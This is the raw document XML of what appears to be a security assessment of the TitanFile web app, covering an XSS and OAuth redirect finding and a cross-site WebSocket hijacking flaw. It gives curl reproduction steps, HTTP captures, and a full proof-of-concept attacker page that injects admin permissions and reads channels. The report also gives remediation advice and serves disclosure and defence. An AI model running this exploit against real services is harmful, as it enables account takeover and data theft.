        <w:t xml:space="preserve">  ajax.aspnetcdn.com *.pendo.io *.zuora.com 'unsafe-inline' 'unsafe-eval'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Request — Verify OAuth dynamic redirect_uri (3 subdomains tested):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -sI "https://app.titanfile.com/login/google-oauth2/" | grep redirect_uri</w:t>
        <w:br/>
        <w:t>redirect_uri=https://app.titanfile.com/complete/google-oauth2/</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -sI "https://evil-attacker.titanfile.com/login/google-oauth2/" | grep redirect_uri</w:t>
        <w:br/>
        <w:t>redirect_uri=https://evil-attacker.titanfile.com/complete/google-oauth2/</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -sI "https://secure-login.titanfile.com/login/google-oauth2/" | grep redirect_uri</w:t>
        <w:br/>
        <w:t>redirect_uri=https://secure-login.titanfile.com/complete/google-oauth2/</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HTML rendering in previewer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Content sanitized through DOMPurify before DOM insertion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Raw HTML passed directly to .html() without any sanitization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Script execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CSP blocks inline scripts via nonce requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>unsafe-inline + unsafe-eval allows all inline scripts to execute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>File preview isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Preview rendered in sandboxed iframe with restrictive CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Preview rendered in main authenticated page context with full DOM access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitability: HIGH — Attacker only needs to share a file with the victim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Impact: CRITICAL — Full account takeover via OAuth code theft</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Affected Population: All authenticated users who preview shared files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Complexity: LOW — No special conditions required</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Privileges Required: LOW — Any authenticated user with file sharing access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>User Interaction: REQUIRED — Victim must click "Preview" on the shared file</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Sanitize all HTML before passing to .html() using DOMPurify:</w:t>
              <w:br/>
              <w:t>this.$('#previewer').html(DOMPurify.sanitize(this.options.html))</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Short-term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Migrate authenticated pages to nonce-based CSP (matching login page), removing unsafe-inline and unsafe-eval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</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Render file previews in a sandboxed &lt;iframe&gt; with sandbox="allow-same-origin" (no allow-scripts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium-term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hardcode OAuth redirect_uri to https://app.titanfile.com/complete/google-oauth2/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-79: Improper Neutralization of Input During Web Page Generation — https://cwe.mitre.org/data/definitions/79.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP DOM-Based XSS Prevention Cheat Sheet — https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>DOMPurify Library — https://github.com/cure53/DOMPurify</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP Testing Guide: DOM-Based XSS — https://owasp.org/www-project-web-security-testing-guide/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>VULN-002: Cross-Site WebSocket Hijacking via Unauthenticated Socket.IO with Permission Overwrite Leading to Admin Escalation</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CRITICAL</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9.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L)</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CWE-306 (Missing Authentication for Critical Function), CWE-1275 (Sensitive Cookie with Improper SameSite), CWE-269 (Improper Privilege Management)</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A07:2021 — Identification and Authentication Failures</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https://app.titanfile.com/socket.io/</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Socket.IO transport layer, admin/commands.js, users/models.js</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TitanFile Socket.IO endpoint accepts transport handshakes and issues valid session identifiers without requiring any form of authentication. Combined with the AWSALBTGCORS cookie's SameSite=None attribute (which causes it to be sent with cross-origin requests), an attacker can establish authenticated WebSocket connections from a malicious web page when a TitanFile user visits it. Once connected, the attacker can exploit socket event handlers that blindly overwrite user permissions and configuration, enabling privilege escalation to administrator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Confidentiality: CRITICAL — Attacker can read all channels, files, notifications via 85+ socket events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Integrity: CRITICAL — Attacker can modify user permissions, subscription config, delete files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Availability: MEDIUM — Attacker can trigger admin:softlockout or admin:hardlockout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Affected Users: Any TitanFile user who visits an attacker-controlled web page while logged in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Part 1 — Unauthenticated Socket.IO Handshake: The Socket.IO endpoint issues valid session IDs to any requester without checking authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>GET /socket.io/?EIO=4&amp;transport=polling HTTP/2</w:t>
        <w:br/>
        <w:t>Host: app.titanfile.com</w:t>
        <w:br/>
        <w:t>(No cookies, no auth headers)</w:t>
        <w:br/>
        <w:br/>
        <w:t>Response: 0{"sid":"UtPxARKd6UhI5D0WA_YB","upgrades":["websocket"],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "pingTimeout":60000,"pingInterval":10000,"maxPayload":1000000}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Part 2 — SameSite=None Cookie: The AWSALBTGCORS cookie is set with SameSite=None; Secure, meaning it is sent with cross-origin WebSocket requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>set-cookie: AWSALBTGCORS=...; Path=/; SameSite=None; Secure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Part 3 — Permission Cache Overwrite: The admin/commands.js file reveals that permissions:update_perm_cache directly overwrites the user's permission set:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>// admin/commands.js (Lines 102-110)</w:t>
        <w:br/>
        <w:t>permissionsChanged: function (data) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const perms = new Set(data.permissions)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  TitanFile.user.set('permissions', perms);  // Blindly trusts data</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>// users/models.js (Lines 218-220)</w:t>
        <w:br/>
        <w:t>updateUserConfigs: function (data) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  for (const key in data) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    TitanFile.user.set(key, data[key][1])  // Overwrites ANY user attribute</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step-by-Step Reproduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:t>Confirm unauthenticated Socket.IO handshake returns valid SID:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -s "https://app.titanfile.com/socket.io/?EIO=4&amp;transport=polling"</w:t>
        <w:br/>
        <w:t>0{"sid":"UtPxARKd6UhI5D0WA_YB","upgrades":["websocket"],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "pingTimeout":60000,"pingInterval":10000,"maxPayload":1000000}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r>
        <w:t>Confirm POST events accepted on unauthenticated session:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ SID="UtPxARKd6UhI5D0WA_YB"</w:t>
        <w:br/>
        <w:t>$ curl -s -X POST "https://app.titanfile.com/socket.io/?EIO=4&amp;transport=polling&amp;sid=$SID" -d '40'</w:t>
        <w:br/>
        <w:t>OK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r>
        <w:t>Confirm AWSALBTGCORS cookie has SameSite=None:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 6:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -sI "https://app.titanfile.com/" | grep AWSALBTGCORS</w:t>
        <w:br/>
        <w:t>set-cookie: AWSALBTGCORS=...; Path=/; SameSite=None; Secure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 7: </w:t>
      </w:r>
      <w:r>
        <w:t>Confirm vulnerable permission overwrite handlers exist in source code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 8:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -s "https://app.titanfile.com/static/js/admin/commands.js" | grep -A5 "permissionsChanged"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  permissionsChanged: function (data) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const perms = new Set(data.permissions)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    TitanFile.user.set('permissions', perms);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Attacker's malicious web page that performs Cross-Site WebSocket Hijacking:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>&lt;!-- Attacker's malicious web page (CSWSH exploit) --&gt;</w:t>
        <w:br/>
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
        <w:br/>
        <w:t>&lt;html&gt;</w:t>
        <w:br/>
        <w:t>&lt;head&gt;&lt;title&gt;Innocent Page&lt;/title&gt;&lt;/head&gt;</w:t>
        <w:br/>
        <w:t>&lt;body&gt;</w:t>
        <w:br/>
        <w:t>&lt;h1&gt;Loading content...&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t>&lt;script&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  // Open WebSocket to TitanFile (AWSALBTGCORS cookie sent automatically)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  var socket = new WebSocket('wss://app.titanfile.com/socket.io/?EIO=4&amp;transport=websocket');</w:t>
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
        <w:br/>
        <w:t xml:space="preserve">  socket.onopen = function() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    socket.send('40');  // Socket.IO connect packet</w:t>
        <w:br/>
        <w:t xml:space="preserve">  };</w:t>
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
        <w:br/>
        <w:t xml:space="preserve">  socket.onmessage = function(event) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (event.data.startsWith('40')) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      // Inject elevated permissions into victim's session</w:t>
        <w:br/>
        <w:t xml:space="preserve">      socket.send('42["permissions:update_perm_cache",' +</w:t>
        <w:br/>
        <w:t xml:space="preserve">        '{"permissions":["tf_permissions.tf_admin",' +</w:t>
        <w:br/>
        <w:t xml:space="preserve">        '"tf_permissions.tf_manage_users",' +</w:t>
        <w:br/>
        <w:t xml:space="preserve">        '"tf_permissions.tf_impersonate_users"]}]');</w:t>
        <w:br/>
        <w:t xml:space="preserve">      </w:t>
        <w:br/>
        <w:t xml:space="preserve">      // Read victim's channels</w:t>
        <w:br/>
        <w:t xml:space="preserve">      socket.send('42["channels:search",{"query":"*","paginate_by":100}]');</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  };</w:t>
        <w:br/>
        <w:t>&lt;/script&gt;</w:t>
        <w:br/>
        <w:t>&lt;/body&gt;</w:t>
        <w:br/>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Unauthenticated handshake (captured June 11, 2026):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>&gt; GET /socket.io/?EIO=4&amp;transport=polling HTTP/2</w:t>
        <w:br/>
        <w:t>&gt; Host: app.titanfile.com</w:t>
        <w:br/>
        <w:t>&gt; User-Agent: curl/8.5.0</w:t>
        <w:br/>
        <w:t>&gt; (No cookies sent)</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt; HTTP/2 200</w:t>
        <w:br/>
        <w:t>&lt; content-type: text/plain; charset=UTF-8</w:t>
        <w:br/>
        <w:t>&lt; set-cookie: AWSALBTGCORS=...; Path=/; SameSite=None; Secure</w:t>
        <w:br/>
        <w:br/>
        <w:t>0{"sid":"wdCT0qoZkwUdfxRoAAeR","upgrades":["websocket"],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "pingTimeout":60000,"pingInterval":10000,"maxPayload":1000000}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>POST event accepted:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>&gt; POST /socket.io/?EIO=4&amp;transport=polling&amp;sid=wdCT0qoZkwUdfxRoAAeR HTTP/2</w:t>
        <w:br/>
        <w:t>&gt; Content-Length: 2</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt; HTTP/2 200</w:t>
        <w:br/>
        <w:t>&lt; content-type: text/plain</w:t>
        <w:br/>
        <w:t>&lt; content-length: 2</w:t>
        <w:br/>
        <w:br/>
        <w:t>OK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Admin socket events confirmed in source:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -s "https://app.titanfile.com/static/js/admin/commands.js" | grep "socket.on"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    socket.on('admin:enabledebug', this.enableDebug);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    socket.on('admin:softlockout', this.softLockout);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    socket.on('admin:hardlockout', this.hardLockout);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    socket.on('permissions:update_perm_cache', this.permissionsChanged);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Complete Socket Event Surface (85+ events)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Admin (4): admin:enabledebug, admin:softlockout, admin:hardlockout, permissions:update_perm_cache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Channels (35+): channels:create, channels:read, channels:readfiles, channels:search, channels:delete, channels:restore, channels:rename, channels:reassign, channels:addcontact, channels:editcontact, channels:updateoptions, channels:deletefiles, channels:aspdf, channels:aszip, and 20+ more</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Files (5): files:virusscan, files:buildarchive, files:archiveprogress, files:watermarkpdf, files:browsercomplete</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>User (16): user:checkbuildandauth, user:preparefor2fa, user:update, user:adddelegate, user:removedelegate, user:newlogin, user:updatesubconfiguration, user:updateuserconfiguration, and 8 more</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Contacts (3): contacts:star, contacts:update, channelcontacts:remove</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Notifications (4): notifications:bulkdelete, notifications:count, notifications:setseen, invalidatecache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Other (8+): messages:previewtoken, logs:createcsvreport, subscription:elevatetrial, members_update_sub, and more</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Socket.IO handshake</w:t>
